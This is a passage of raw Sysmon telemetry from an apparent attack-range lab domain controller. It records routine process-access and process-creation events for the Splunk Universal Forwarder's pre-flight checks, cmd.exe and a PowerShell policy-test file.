AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7CDE-5FA1-2201-000000008801}34123032C:\Windows\system32\cmd.exe{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.943{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7CDE-5FA1-2201-000000008801}3412C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-2201-000000008801}3412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-2201-000000008801}3412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CDE-5FA1-2201-000000008801}3412C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.938{D28789B6-7CDE-5FA1-2201-000000008801}3412C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.924{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_txgoeqza.wyj.ps12020-11-03 15:53:02.924 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 